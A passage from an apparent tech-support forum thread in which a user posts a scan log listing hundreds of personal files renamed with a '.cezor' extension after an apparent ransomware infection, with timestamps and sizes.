    2019-07-09 15:37 - 2018-12-13 21:05 - 000090849 _____ C:\Users\ADMIN\Downloads\Wisdom Teeth Woes.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 21:23 - 000014998 _____ C:\Users\ADMIN\Downloads\That Part Where You Said.txt.cezor
    2019-07-09 15:37 - 2018-12-11 21:22 - 000056227 _____ C:\Users\ADMIN\Downloads\That Part Where You Said.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 16:36 - 000024377 _____ C:\Users\ADMIN\Downloads\Wo Rauch Ist.txt.cezor
    2019-07-09 15:37 - 2018-12-11 16:35 - 000119069 _____ C:\Users\ADMIN\Downloads\took no time with the fall.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 16:35 - 000087673 _____ C:\Users\ADMIN\Downloads\Wo Rauch Ist.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 16:35 - 000050479 _____ C:\Users\ADMIN\Downloads\took no time with the fall.txt.cezor
    2019-07-09 15:37 - 2018-12-09 20:51 - 000013947 _____ C:\Users\ADMIN\Downloads\yeah.jpg.cezor
    2019-07-09 15:37 - 2018-12-09 20:50 - 000051427 _____ C:\Users\ADMIN\Downloads\yea.jpg.cezor
    2019-07-09 15:37 - 2018-12-08 16:52 - 000066056 _____ C:\Users\ADMIN\Downloads\ten.jpg.cezor
    2019-07-09 15:37 - 2018-12-08 16:52 - 000053429 _____ C:\Users\ADMIN\Downloads\tae.jpg.cezor
    2019-07-09 15:37 - 2018-12-07 13:46 - 000069133 _____ C:\Users\ADMIN\Downloads\taeyongie.jpg.cezor
    2019-07-09 15:37 - 2018-12-07 13:45 - 000310359 _____ C:\Users\ADMIN\Downloads\taeyong.jpg.cezor
    2019-07-09 15:37 - 2018-12-07 13:43 - 000062901 _____ C:\Users\ADMIN\Downloads\tumblr_pf3crt64Mj1ww10eeo7_640.jpg.cezor
    2019-07-09 15:37 - 2018-12-06 22:51 - 000073150 _____ C:\Users\ADMIN\Downloads\wonHoe.png.cezor
    2019-07-09 15:37 - 2018-12-06 22:49 - 000019519 _____ C:\Users\ADMIN\Downloads\wonho.jpg.cezor
    2019-07-09 15:37 - 2018-12-06 22:40 - 000381320 _____ C:\Users\ADMIN\Downloads\the color red.pdf.cezor
    2019-07-09 15:37 - 2018-12-05 22:50 - 000349116 _____ C:\Users\ADMIN\Downloads\Unwritten.pdf.cezor
    2019-07-09 15:37 - 2018-12-05 22:50 - 000209893 _____ C:\Users\ADMIN\Downloads\Unwritten.txt.cezor
    2019-07-09 15:37 - 2018-12-01 23:05 - 004513547 _____ C:\Users\ADMIN\Downloads\[STATION] TEN 텐 'New Heroes' MV.mp3.cezor
    2019-07-09 15:37 - 2018-11-26 21:39 - 005076538 _____ C:\Users\ADMIN\Downloads\[MV] SEVENTEEN(세븐틴) - 어쩌나 (Oh My!).mp3.cezor
    2019-07-09 15:37 - 2018-11-22 22:35 - 000210228 _____ C:\Users\ADMIN\Downloads\That Old Black Magic.txt.cezor
    2019-07-09 15:37 - 2018-11-22 22:34 - 000308574 _____ C:\Users\ADMIN\Downloads\That Old Black Magic.pdf.cezor
    2019-07-09 15:37 - 2018-11-21 21:25 - 000074302 _____ C:\Users\ADMIN\Downloads\The Electric Fizzing Prick.pdf.cezor
    2019-07-09 15:37 - 2018-11-21 21:25 - 000024761 _____ C:\Users\ADMIN\Downloads\The Electric Fizzing Prick.txt.cezor
    2019-07-09 15:37 - 2018-11-12 22:39 - 006441384 _____ C:\Users\ADMIN\Downloads\유희열의 스케치북 - 몬스타엑스 - Versace On Floor 20181109.mp3.cezor
    2019-07-09 15:37 - 2018-11-04 12:55 - 000299230 _____ C:\Users\ADMIN\Downloads\tumblr_ow13bbRMqi1tiidtho5_1280.png.cezor
    2019-07-09 15:37 - 2018-11-02 17:07 - 000170544 _____ C:\Users\ADMIN\Downloads\tumblr_pfuqu3BGDa1xdpcw1o2_400.png.cezor
    2019-07-09 15:37 - 2018-11-02 16:56 - 000205486 _____ C:\Users\ADMIN\Downloads\tumblr_pfbt9jgOfa1xdpcw1o2_400.png.cezor
    2019-07-09 15:37 - 2018-11-02 16:48 - 000115764 _____ C:\Users\ADMIN\Downloads\superthumb (2).png.cezor
    2019-07-09 15:37 - 2018-11-02 16:47 - 000125505 _____ C:\Users\ADMIN\Downloads\superthumb (1).png.cezor
    2019-07-09 15:37 - 2018-11-02 16:44 - 000110879 _____ C:\Users\ADMIN\Downloads\superthumb.png.cezor
    2019-07-09 15:37 - 2018-11-02 16:24 - 000053201 _____ C:\Users\ADMIN\Downloads\sun-moon-firered-b1.51.sgm.cezor
    2019-07-09 15:37 - 2018-11-01 20:26 - 000131150 _____ C:\Users\ADMIN\Downloads\sun-moon-firered-b1.5.sav.cezor
    2019-07-09 15:37 - 2018-11-01 20:22 - 006383629 _____ C:\Users\ADMIN\Downloads\sun-moon-firered-b1.5.zip.cezor
    2019-07-09 15:37 - 2018-10-30 21:29 - 000041086 _____ C:\Users\ADMIN\Downloads\Sweet Quiznak.txt.cezor
    2019-07-09 15:37 - 2018-10-30 21:27 - 000101610 _____ C:\Users\ADMIN\Downloads\Sweet Quiznak.pdf.cezor
    2019-07-09 15:37 - 2018-10-28 13:30 - 000227882 _____ C:\Users\ADMIN\Downloads\tumblr_pgtg0rOTcW1xdpcw1o1_400.png.cezor
    2019-07-09 15:37 - 2018-10-28 13:30 - 000215081 _____ C:\Users\ADMIN\Downloads\tumblr_pgtg0rOTcW1xdpcw1o2_400.png.cezor
    2019-07-09 15:37 - 2018-10-27 15:53 - 000210612 _____ C:\Users\ADMIN\Downloads\Stilinskis Home for Wayward.txt.cezor
    2019-07-09 15:37 - 2018-10-27 15:52 - 000322011 _____ C:\Users\ADMIN\Downloads\Stilinskis Home for Wayward.pdf.cezor
    2019-07-09 15:37 - 2018-10-22 17:08 - 000213049 _____ C:\Users\ADMIN\Downloads\tumblr_oy35hi0fZl1ul5fqko1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-10-22 17:08 - 000071605 _____ C:\Users\ADMIN\Downloads\tumblr_oxfabpRQxt1qj47bio1_1280.png.cezor
    2019-07-09 15:37 - 2018-10-22 17:06 - 000085693 _____ C:\Users\ADMIN\Downloads\tumblr_oeea7gYbJg1vbuge9o1_640.jpg.cezor
    2019-07-09 15:37 - 2018-10-22 17:05 - 000289531 _____ C:\Users\ADMIN\Downloads\tumblr_ow5olcg5np1tx7huro1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-10-22 17:03 - 000021316 _____ C:\Users\ADMIN\Downloads\tumblr_oz0aopBytQ1vsboz2o1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-10-21 18:35 - 000038332 _____ C:\Users\ADMIN\Downloads\theres a heart stain on the.txt.cezor
    2019-07-09 15:37 - 2018-10-21 18:35 - 000009624 _____ C:\Users\ADMIN\Downloads\you stole a pizza my heart.txt.cezor
    2019-07-09 15:37 - 2018-10-21 18:34 - 000096611 _____ C:\Users\ADMIN\Downloads\theres a heart stain on the.pdf.cezor
    2019-07-09 15:37 - 2018-10-21 18:34 - 000047705 _____ C:\Users\ADMIN\Downloads\you stole a pizza my heart.pdf.cezor
    2019-07-09 15:37 - 2018-10-19 22:33 - 000070339 _____ C:\Users\ADMIN\Downloads\the rain falls for you.pdf.cezor
    2019-07-09 15:37 - 2018-10-19 22:33 - 000024127 _____ C:\Users\ADMIN\Downloads\the rain falls for you2.txt.cezor
    2019-07-09 15:37 - 2018-10-16 19:16 - 000096669 _____ C:\Users\ADMIN\Downloads\tumblr_p3fvqphgRt1vxe4v6o1_500.png.cezor
    2019-07-09 15:37 - 2018-10-15 16:50 - 000141240 _____ C:\Users\ADMIN\Downloads\tumblr_p128ohZzuO1tu0yl5o1_500.gif.cezor
    2019-07-09 15:37 - 2018-10-15 16:48 - 000291562 _____ C:\Users\ADMIN\Downloads\waa.png.cezor
    2019-07-09 15:37 - 2018-10-15 16:33 - 002167120 _____ C:\Users\ADMIN\Downloads\tenor.gif.cezor
    2019-07-09 15:37 - 2018-10-15 16:27 - 000000000 ____D C:\Users\ADMIN\Downloads\jaemin pics (@najaeminpics) _ Twitter_files
    2019-07-09 15:37 - 2018-10-13 23:48 - 000249798 _____ C:\Users\ADMIN\Downloads\tumblr_ow2jhkQQ5t1sy4y3mo6_1280.png.cezor
    2019-07-09 15:37 - 2018-10-13 23:38 - 000040785 _____ C:\Users\ADMIN\Downloads\tumblr_p70is2YarJ1xnrvkgo1_500.jpg.cezor
    2019-07-09 15:37 - 2018-09-29 19:05 - 006186847 _____ C:\Users\ADMIN\Downloads\[STATION] NCT U 텐데... (Timeless) Live Video.mp3.cezor
    2019-07-09 15:37 - 2018-09-05 12:26 - 000000000 ____D C:\Users\ADMIN\Documents\Outlook Files
    2019-07-09 15:37 - 2018-08-26 17:33 - 000000000 ___SD C:\Users\ADMIN\Documents\My Data Sources
    2019-07-09 15:37 - 2018-08-17 13:19 - 005835474 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal) (2).avi.cezor
    2019-07-09 15:37 - 2018-08-17 13:16 - 002808078 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal).mp3.cezor
    2019-07-09 15:37 - 2018-08-17 13:15 - 021480940 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal) (1).avi.cezor
    2019-07-09 15:37 - 2018-08-17 13:02 - 021480940 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal).avi.cezor
    2019-07-09 15:37 - 2018-08-11 23:35 - 000145462 _____ C:\Users\ADMIN\Downloads\tumblr_nkd5yfW2461ts5yjso2_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:35 - 000119729 _____ C:\Users\ADMIN\Downloads\tumblr_nkd5yfW2461ts5yjso1_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:26 - 000188932 _____ C:\Users\ADMIN\Downloads\tumblr_p63l5kZSwp1ws6v9po1_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:26 - 000187620 _____ C:\Users\ADMIN\Downloads\tumblr_p63l5kZSwp1ws6v9po2_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:24 - 000143726 _____ C:\Users\ADMIN\Downloads\tumblr_p1kpahNNyk1vbx9r9o2_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 20:37 - 000160329 _____ C:\Users\ADMIN\Downloads\tumblr_o2v67e8gut1rr9hsgo2_r2_500.png.cezor
    2019-07-09 15:37 - 2018-08-11 20:37 - 000138967 _____ C:\Users\ADMIN\Downloads\tumblr_o2v67e8gut1rr9hsgo1_r2_500.png.cezor
    2019-07-09 15:37 - 2018-08-11 20:35 - 000100553 _____ C:\Users\ADMIN\Downloads\tumblr_o0wan1ry491uibbmuo2_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-11 20:35 - 000099921 _____ C:\Users\ADMIN\Downloads\tumblr_o0wan1ry491uibbmuo1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-11 20:31 - 000092224 _____ C:\Users\ADMIN\Downloads\tumblr_p64ts6LyfT1x4d20bo1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-11 20:31 - 000075292 _____ C:\Users\ADMIN\Downloads\tumblr_p64ts6LyfT1x4d20bo2_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-03 18:13 - 005758648 _____ C:\Users\ADMIN\Downloads\[MV] 이달의 소녀최리 (LOONAChoerry) Love Cherry Motion.mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:11 - 005312268 _____ C:\Users\ADMIN\Downloads\Touch - Troye Sivan (Lyrics).mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:08 - 004951151 _____ C:\Users\ADMIN\Downloads\【Nightcore】→ Jar Of Hearts ( Switching Vocals ) Lyrics.mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:07 - 005601287 _____ C:\Users\ADMIN\Downloads\Troye Sivan - Dance To This (Official Audio) ft. Ariana Grande.mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:07 - 004508532 _____ C:\Users\ADMIN\Downloads\♪ Nightcore - Just Like Fire Heart Attack (Switching Vocals).mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:05 - 005417594 _____ C:\Users\ADMIN\Downloads\Troye Sivan - Bloom (Lyric Video).mp3.cezor
    2019-07-09 15:37 - 2018-07-28 19:46 - 000000000 ____D C:\Users\ADMIN\Desktop\op songs for being pro
    2019-07-09 15:37 - 2018-07-28 15:22 - 002527046 _____ C:\Users\ADMIN\Downloads\UnacceptableSplendidApatosaur-size_restricted.gif.cezor
    2019-07-09 15:37 - 2018-07-25 15:28 - 000035144 _____ C:\Users\ADMIN\Downloads\Tumblr_n8o1cv3yPA1snc5kxo1_r3_500.png.cezor
    2019-07-09 15:37 - 2018-07-25 15:27 - 000031186 _____ C:\Users\ADMIN\Downloads\tumblr_static_tumblr_static__640.png.cezor
    2019-07-09 15:37 - 2018-07-21 17:33 - 000373635 _____ C:\Users\ADMIN\Downloads\X (1).pdf.cezor
    2019-07-09 15:37 - 2018-07-19 17:12 - 000000000 ____D C:\Users\ADMIN\Desktop\Warframe
    2019-07-09 15:37 - 2018-07-19 16:52 - 049905742 _____ C:\Users\ADMIN\Downloads\Warframe.msi.cezor
    2019-07-09 15:37 - 2018-07-16 20:40 - 000023756 _____ C:\Users\ADMIN\Downloads\tumblr_or0jh0wSxp1vdvq2wo1_500.jpg.cezor
    2019-07-09 15:37 - 2018-07-16 20:39 - 000005280 _____ C:\Users\ADMIN\Downloads\th.jpg.cezor
    2019-07-09 15:37 - 2018-07-16 20:33 - 001502527 _____ C:\Users\ADMIN\Downloads\tumblr_static_tumblr_static_filename_640.gif.cezor
    2019-07-09 15:37 - 2018-07-16 20:32 - 000421649 _____ C:\Users\ADMIN\Downloads\tumblr_omzv70UUBp1vjst4no4_1280.jpg.cezor
    2019-07-09 15:37 - 2018-07-16 13:29 - 002440817 _____ C:\Users\ADMIN\Downloads\SNsanafonyuV21.zip.cezor
    2019-07-09 15:37 - 2018-07-16 13:10 - 001622503 _____ C:\Users\ADMIN\Downloads\Tooru.(Kobayashi-san.Chi.no.Maid.Dragon).full.2108753.jpg.cezor
    2019-07-09 15:37 - 2018-07-15 17:34 - 000373635 _____ C:\Users\ADMIN\Downloads\X.pdf.cezor
    2019-07-09 15:37 - 2018-05-12 15:41 - 005707239 _____ C:\Users\ADMIN\Downloads\you can be king again.mp3.cezor
    2019-07-09 15:37 - 2018-05-12 15:40 - 005273398 _____ C:\Users\ADMIN\Downloads\[MV] BTS(방탄소년단) _ I NEED U.mp3.cezor
    2019-07-09 15:37 - 2018-02-25 17:20 - 000000235 _____ C:\Users\ADMIN\Downloads\unnamed.png.cezor
    2019-07-09 15:37 - 2018-02-25 17:20 - 000000235 _____ C:\Users\ADMIN\Downloads\unnamed (1).png.cezor
    2019-07-09 15:37 - 2018-02-10 16:47 - 000260945 _____ C:\Users\ADMIN\Downloads\thumb-1920-567359.jpg.cezor
    2019-07-09 15:37 - 2018-02-07 15:51 - 000044420 _____ C:\Users\ADMIN\Downloads\VD0K8Ua.gif.cezor
    2019-07-09 15:37 - 2017-12-09 17:57 - 179236805 _____ C:\Users\ADMIN\Downloads\The.Sims.4.Cats.and.Dogs.v1.36.102.1020.MULTI.17.zip.cezor
    2019-07-09 15:37 - 2017-12-03 19:55 - 000000000 ____D C:\Users\ADMIN\Documents\WolfQuest2
    2019-07-09 15:37 - 2017-12-03 19:39 - 224404558 _____ C:\Users\ADMIN\Downloads\WolfQuest_Win_20111011.msi.cezor
    2019-07-09 15:37 - 2017-12-01 21:52 - 601915294 _____ C:\Users\ADMIN\Downloads\SSF2BetaSetup.v1.0.3.2.exe.cezor
    2019-07-09 15:37 - 2017-11-30 21:58 - 007487920 _____ C:\Users\ADMIN\Downloads\ssfsetup.exe.cezor
    2019-07-09 15:37 - 2017-11-08 18:28 - 000677460 _____ C:\Users\ADMIN\Downloads\TXqeaCLYSWqN0eKeiAIDKw.png.cezor
    2019-07-09 15:37 - 2017-11-08 18:27 - 000750861 _____ C:\Users\ADMIN\Downloads\_5JFIY8NSDO4UowU9jXjNA.png.cezor
    2019-07-09 15:37 - 2017-10-01 22:20 - 000064208 _____ C:\Users\ADMIN\Downloads\yuuu.jpg.cezor
    2019-07-09 15:37 - 2017-09-26 13:47 - 000039123 _____ C:\Users\ADMIN\Downloads\ty.jpg.cezor
    2019-07-09 15:37 - 2017-09-23 19:01 - 000064796 _____ C:\Users\ADMIN\Downloads\YOONGI.jpg.cezor
    2019-07-09 15:37 - 2017-09-23 16:47 - 000007672 _____ C:\Users\ADMIN\Downloads\yuu.jpg.cezor
    2019-07-09 15:37 - 2017-09-23 12:30 - 000013515 _____ C:\Users\ADMIN\Downloads\yhita.jpg.cezor
    2019-07-09 15:37 - 2017-09-22 15:21 - 000009163 _____ C:\Users\ADMIN\Downloads\yo.jpg.cezor
    2019-07-09 15:37 - 2017-09-21 12:28 - 000000530 _____ C:\Users\ADMIN\Downloads\url.htm.cezor
    2019-07-09 15:37 - 2017-07-03 14:15 - 000052498 _____ C:\Users\ADMIN\Downloads\_photo_booth___kageyama_tobio_x_reader__by_bakageyama-d85zton.jpg.cezor
    2019-07-09 15:37 - 2017-04-05 19:10 - 006724536 _____ C:\Users\ADMIN\Downloads\UNIT-1.PDF.cezor
    2019-07-09 15:37 - 2016-12-29 16:19 - 000000000 ____D C:\Users\ADMIN\Downloads\MCLeaksAuthenticator
    2019-07-09 15:37 - 2016-12-12 21:16 - 000079301 _____ C:\Users\ADMIN\Downloads\tumblr_n874e2uZHK1snc5kxo1_1280.gif.cezor
    2019-07-09 15:37 - 2016-12-12 21:08 - 000736050 _____ C:\Users\ADMIN\Downloads\❄️ (@nekoshoyo) _ Twitter.html.cezor
    2019-07-09 15:37 - 2016-12-12 21:08 - 000000000 ____D C:\Users\ADMIN\Downloads\❄️ (@nekoshoyo) _ Twitter_files
    2019-07-09 15:37 - 2016-12-10 13:47 - 008039538 _____ C:\Users\ADMIN\Downloads\Tube Tycoon B1.2.4.zip.cezor
    2019-07-09 15:37 - 2016-11-20 18:39 - 000190960 _____ C:\Users\ADMIN\Downloads\Zen_home.jpg.cezor
    2019-07-09 15:37 - 2016-11-14 13:32 - 000434223 _____ C:\Users\ADMIN\Downloads\tumblr_static_tumblr_static_bc8sx0q9g0g8ggws4ogoskgo4_640.png.cezor
    2019-07-09 15:37 - 2016-11-14 13:32 - 000222743 _____ C:\Users\ADMIN\Downloads\tumblr_o2x5pq7iXm1v8gdx4o1_1280.jpg.cezor
    2019-07-09 15:37 - 2016-11-14 13:29 - 000274940 _____ C:\Users\ADMIN\Downloads\tumblr_n0zvroQjNm1r1p25so1_500.gif.cezor
    2019-07-09 15:37 - 2016-11-01 12:33 - 004231222 _____ C:\Users\ADMIN\Downloads\WoT_internet_install_asia.exe.cezor
    2019-07-09 15:37 - 2016-09-22 18:51 - 000000931 _____ C:\Users\ADMIN\Downloads\ubot (1).user.js.cezor
    2019-07-09 15:37 - 2016-09-22 00:31 - 000000000 ____D C:\Users\ADMIN\Downloads\certs
    2019-07-09 15:37 - 2016-08-30 16:40 - 000000000 ____D C:\Users\ADMIN\Documents\Lightshot
    2019-07-09 15:37 - 2016-08-16 18:14 - 012769817 _____ C:\Users\ADMIN\Downloads\VID-20160813-WA0001.mp4.cezor
    2019-07-09 15:37 - 2016-08-11 14:28 - 000028058 _____ C:\Users\ADMIN\Downloads\tumblr_inline_nmyvkrpSvY1sowzkr_400.jpg.cezor
    2019-07-09 15:37 - 2016-08-04 13:54 - 000000000 ____D C:\Users\ADMIN\Downloads\RIP III
    2019-07-09 15:37 - 2016-07-05 21:34 - 000000000 ____D C:\Users\ADMIN\Downloads\ModernHD 1.9
    2019-07-09 15:37 - 2016-03-26 15:14 - 001226486 _____ C:\Users\ADMIN\Downloads\Suga.full.19352.jpg.cezor
    2019-07-09 15:37 - 2016-03-23 22:15 - 000016593 _____ C:\Users\ADMIN\Downloads\Suga-bts-35194130-500-340.jpg.cezor
    2019-07-09 15:37 - 2016-03-23 22:14 - 004394502 _____ C:\Users\ADMIN\Downloads\WaroftheDjinn.zip.cezor
    2019-07-09 15:37 - 2016-03-22 13:56 - 000126693 _____ C:\Users\ADMIN\Downloads\TrenBW5.png.cezor
    2019-07-09 15:37 - 2016-03-22 13:55 - 000018369 _____ C:\Users\ADMIN\Downloads\tumblr_o3luxkxlWH1v2cstjo1_500.jpg.cezor
    2019-07-09 15:37 - 2016-03-22 13:47 - 000116491 _____ C:\Users\ADMIN\Downloads\xl9ZF2S_burned.png.cezor
    2019-07-09 15:37 - 2016-03-22 13:37 - 000144624 _____ C:\Users\ADMIN\Downloads\xl9ZF2S.png.cezor
    2019-07-09 15:37 - 2016-03-22 13:36 - 000144405 _____ C:\Users\ADMIN\Downloads\YqDF3Ce.png.cezor
    2019-07-09 15:37 - 2016-03-19 22:21 - 000000000 ____D C:\Users\ADMIN\Downloads\Hyper Projection Performance Haikyuu!!
    2019-07-09 15:37 - 2016-03-17 19:52 - 000000000 ____D C:\Users\ADMIN\Documents\Collage Maker Projects
    2019-07-09 15:37 - 2016-03-11 15:30 - 000659875 _____ C:\Users\ADMIN\Downloads\VisualBoyAdvance-1.8.0-beta3.zip.cezor
    2019-07-09 15:37 - 2016-03-11 15:29 - 000365874 _____ C:\Users\ADMIN\Downloads\VisualBoyAdvance-1.2-SDL-Win32-fixed.zip.cezor
    2019-07-09 15:37 - 2016-03-07 15:59 - 000103594 _____ C:\Users\ADMIN\Downloads\yahfie.light.ttf.cezor
    2019-07-09 15:37 - 2016-03-06 15:36 - 000142242 _____ C:\Users\ADMIN\Downloads\tumblr_o0phwu7nbf1tan48fo1_400_burned.png.cezor
    2019-07-09 15:37 - 2016-03-05 13:15 - 000164413 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned (3).png.cezor
    2019-07-09 15:37 - 2016-03-05 13:13 - 000164413 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned (2).png.cezor
    2019-07-09 15:37 - 2016-03-05 13:12 - 000164413 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned (1).png.cezor
    2019-07-09 15:37 - 2016-03-05 13:12 - 000035800 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned.jpg.cezor
    2019-07-09 15:37 - 2016-03-02 14:49 - 000164141 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned.png.cezor
    2019-07-09 15:37 - 2016-02-07 18:39 - 002789693 _____ C:\Users\ADMIN\Downloads\Snavs - Riot (1).mp3.cezor
    2019-07-09 15:37 - 2016-02-07 18:25 - 002789693 _____ C:\Users\ADMIN\Downloads\Snavs - Riot.mp3.cezor
    2019-07-09 15:37 - 2016-02-03 19:55 - 003657794 _____ C:\Users\ADMIN\Downloads\SunnYz - Victory.mp3.cezor
    2019-07-09 15:37 - 2016-01-31 19:02 - 000112176 _____ C:\Users\ADMIN\Downloads\tumblr_nqa4wn9Yx91uriprdo1_500.jpg.cezor
    2019-07-09 15:37 - 2016-01-31 19:01 - 000422831 _____ C:\Users\ADMIN\Downloads\V4KMRF8.png.cezor
    2019-07-09 15:37 - 2016-01-29 17:13 - 003024536 _____ C:\Users\ADMIN\Downloads\YOUTH - Troye Sivan KARAOKE + BACKING VOCALS + LYRICS.m4a.cezor
    2019-07-09 15:37 - 2016-01-29 17:11 - 003048828 _____ C:\Users\ADMIN\Downloads\YOUTH - Troye Sivan KARAOKE + BACKING VOCALS + LYRICS.mp3.cezor
    2019-07-09 15:37 - 2016-01-29 12:14 - 004656299 _____ C:\Users\ADMIN\Downloads\TheFatRat - Monody (feat. Laura Brehm) (1).mp3.cezor
    2019-07-09 15:37 - 2016-01-29 11:03 - 004656299 _____ C:\Users\ADMIN\Downloads\TheFatRat - Monody (feat. Laura Brehm).mp3.cezor
    2019-07-09 15:37 - 2016-01-28 20:00 - 003394480 _____ C:\Users\ADMIN\Downloads\Venemy - Rescue Me (feat. Car) [NCS Release].mp3.cezor
    2019-07-09 15:37 - 2016-01-24 17:12 - 003939501 _____ C:\Users\ADMIN\Downloads\WALK THE MOON - Shut Up and Dance.mp3.cezor
    2019-07-09 15:37 - 2016-01-24 17:03 - 004107812 _____ C:\Users\ADMIN\Downloads\Taio Cruz - Dynamite.mp3.cezor
    2019-07-09 15:37 - 2016-01-22 09:55 - 004150026 _____ C:\Users\ADMIN\Downloads\Spektrem - Shine (Original Mix).mp3.cezor
    2019-07-09 15:37 - 2016-01-08 10:50 - 004817213 _____ C:\Users\ADMIN\Downloads\T & Sugah x NCT - Stardust (feat. Miyoki) [NCS Release].mp3.cezor
    2019-07-09 15:37 - 2016-01-04 20:17 - 003601790 _____ C:\Users\ADMIN\Downloads\Tobu & Syndec - Dusk [NCS Release].mp3.cezor
    2019-07-09 15:37 - 2015-12-14 21:54 - 000000000 ____D C:\Users\ADMIN\Downloads\Need.for.Speed.Rivals.EN-RU.Repack.by.z10yded
    2019-07-09 15:37 - 2015-12-05 15:20 - 000000000 ____D C:\Users\ADMIN\Downloads\resourcepacks
    2019-07-09 15:37 - 2015-12-05 15:19 - 000000000 ____D C:\Users\ADMIN\Downloads\texturepacks
    2019-07-09 15:37 - 2015-12-04 17:00 - 007088586 _____ C:\Users\ADMIN\Downloads\TallcraftDropper1.9.zip.cezor
    2019-07-09 15:37 - 2015-11-26 20:14 - 000000000 ____D C:\Users\ADMIN\Downloads\[R.G. Mechanics] Need for Speed Rivals
    2019-07-09 15:37 - 2015-11-20 13:00 - 000000328 _____ C:\Users\ADMIN\AppData\LocalLow\rbxcsettings.rbx.cezor
    2019-07-09 15:37 - 2015-11-08 17:31 - 003510675 _____ C:\Users\ADMIN\Downloads\Taylor Swift - I Knew You Were Trouble Lyrics (HD).mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:31 - 003448137 _____ C:\Users\ADMIN\Downloads\Taylor Swift - We Are Never Ever Getting Back Together.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:30 - 003889084 _____ C:\Users\ADMIN\Downloads\Taylor Swift - 22.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:30 - 003655581 _____ C:\Users\ADMIN\Downloads\Taylor Swift - You Belong With Me.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:29 - 003919855 _____ C:\Users\ADMIN\Downloads\Taylor Swift - Bad Blood ft. Kendrick Lamar.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:17 - 003440456 _____ C:\Users\ADMIN\Downloads\Troye Sivan - EASE (Lyric Video) ft. Broods.mp3.cezor
    2019-07-09 15:37 - 2015-11-07 13:58 - 001889382 _____ C:\Users\ADMIN\Downloads\uTorrent.exe.cezor
    2019-07-09 15:37 - 2015-11-07 13:50 - 008159518 _____ C:\Users\ADMIN\Downloads\TeamViewer_Setup_en.exe.cezor
    2019-07-09 15:37 - 2015-11-07 13:47 - 029833516 _____ C:\Users\ADMIN\Downloads\vlc-2.2.1-win64.exe.cezor
    2019-07-09 15:37 - 2015-11-07 13:47 - 001964214 _____ C:\Users\ADMIN\Downloads\winrar-x64-53b6.exe.cezor
    2019-07-09 15:37 - 2012-03-05 13:52 - 000000000 ____D C:\Users\ADMIN\Desktop\PokemonEmeraldVersion
    2019-07-09 15:36 - 2019-04-28 18:45 - 000116938 _____ C:\Users\ADMIN\Downloads\mt2.jpg.cezor
    2019-07-09 15:36 - 2019-04-02 10:00 - 000003251 _____ C:\Users\ADMIN\Downloads\Agmaio FREE COINS HACK.user.js.cezor
    2019-07-09 15:36 - 2019-03-19 19:30 - 000052901 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)7.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 19:21 - 000056340 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)6.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 19:14 - 000040661 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)5.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 18:25 - 000054561 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)4.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 18:23 - 000049082 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)3.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 18:14 - 000056686 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)2.sgm.cezor
    2019-07-09 15:36 - 2019-03-17 12:24 - 000048084 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)1.sgm.cezor
     
    Last edited: Jul 15, 2019
  13. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    2019-07-09 15:36 - 2019-02-15 21:24 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (7).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:23 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (6).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:23 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (5).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:22 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (4).user.js.cezor
